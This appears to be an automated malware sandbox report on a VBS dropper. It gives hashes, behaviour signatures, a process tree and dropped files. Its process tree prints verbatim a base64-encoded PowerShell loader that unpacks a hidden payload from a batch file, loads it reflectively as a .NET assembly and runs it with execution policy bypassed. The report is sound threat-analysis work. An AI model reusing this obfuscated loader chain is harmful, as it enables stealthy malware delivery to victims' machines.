d8337b177f29c1422033dbae7b4b1191f9721c54ce02885318ca80aefa446964

General

Target

d8337b177f29c1422033dbae7b4b1191f9721c54ce02885318ca80aefa446964.vbs
Size

296KB
MD5

51cddcbd39641c958d5906dd9c9080ad
SHA1

6dc67e50fe2c5259ea0a0364475d2a9558a1fe3a
SHA256

d8337b177f29c1422033dbae7b4b1191f9721c54ce02885318ca80aefa446964
SHA512

2c03cb2bdfde6838ab0ed24ea310aa6bcfdc5e30a57c861bf9cdca872e098c5fc80ebe664459df5836dcc2bdcc35618800628b9d9afefadc2227ff8de657cae2
SSDEEP

6144:2c7tvCwj2O9lT+TIvZCoJZP2xwrpuHeAFUhhmPhLkJRJ:vKwRwkImzs/Mh2gJP

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2640 powershell.exe
2720 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2640 powershell.exe
2720 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2640 powershell.exe
Token: SeDebugPrivilege 2720 powershell.exe

pid	process
2640	powershell.exe
2720	powershell.exe

pid	process
2640	powershell.exe
2720	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 1728 wrote to memory of 2596	1728	WScript.exe	cmd.exe
PID 1728 wrote to memory of 2596	1728	WScript.exe	cmd.exe
PID 1728 wrote to memory of 2596	1728	WScript.exe	cmd.exe
PID 2596 wrote to memory of 2640	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2640	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2640	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2640	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2720	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2720	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2720	2596	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2720	2596	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d8337b177f29c1422033dbae7b4b1191f9721c54ce02885318ca80aefa446964.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\Jykpxb.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2596

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIkp5a3B4Yi5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\Jykpxb.ps1' -Encoding UTF8"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\Jykpxb.ps1"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8OWITEOMTLBFGYI0A83C.temp

Filesize
7KB

MD5
cdf58a6bbbbe1979fae195429bd0f0dc

SHA1
8a35ac0a94d4aef98bfc1b9535e8bec946b802c8

SHA256
f8570dfaa778c05c3ccf848e1d2dfc6b3fcb9f3972c998f9f9abcf94c81f4969

SHA512
9919e150b226a58e2c1b050853fa0e48c93a919d33213cc7a3b3bc8c7690ae70490c67a8729aa44d30aff5f9d50607ffae3f70f496d3bf781b78d9c99dfd0142

Download Submit
C:\Users\Admin\Jykpxb.bat

Filesize
276KB

MD5
2c111f46d26f1352673ae6dc86a990fe

SHA1
a523fdff3ae3672b0f815c8af3ef0b3982b841d6

SHA256
5f175835c666dba497ed962c90679fc4c61b84a021f68ebb900a0d5d5b660d32

SHA512
6c4ff1a335d5b8671da3e3cc178bb5ae345e45c262617a58087e36260a346fb8ee699d9db057336ea412e11e2288e9ace76c741ee5c6fc18fb91e0206e51c7ff

Download Submit
C:\Users\Admin\Jykpxb.ps1

Filesize
2KB

MD5
f90fbcb070697feb9fcffa1102bf5c9a

SHA1
26406dbe3e8f343b13dae2a44193e0918f99e65a

SHA256
3ddf16f60017414eb9b0ce45e8688b266c735902003e28814147a017a94f1bce

SHA512
23840709dd4908bbff1ccc7d718a5f7cd3ab1a70296f8a99d8ece9e7c8fe7c0a51eaa3a2905e1f4daa70fbbf5285185b4e3a1432191544f02b9270dd76079579

Download Submit
memory/2640-12-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download
memory/2640-13-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download
memory/2640-16-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

Filesize
256KB

Download
memory/2640-15-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

Filesize
256KB

Download
memory/2640-14-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

Filesize
256KB

Download
memory/2640-18-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing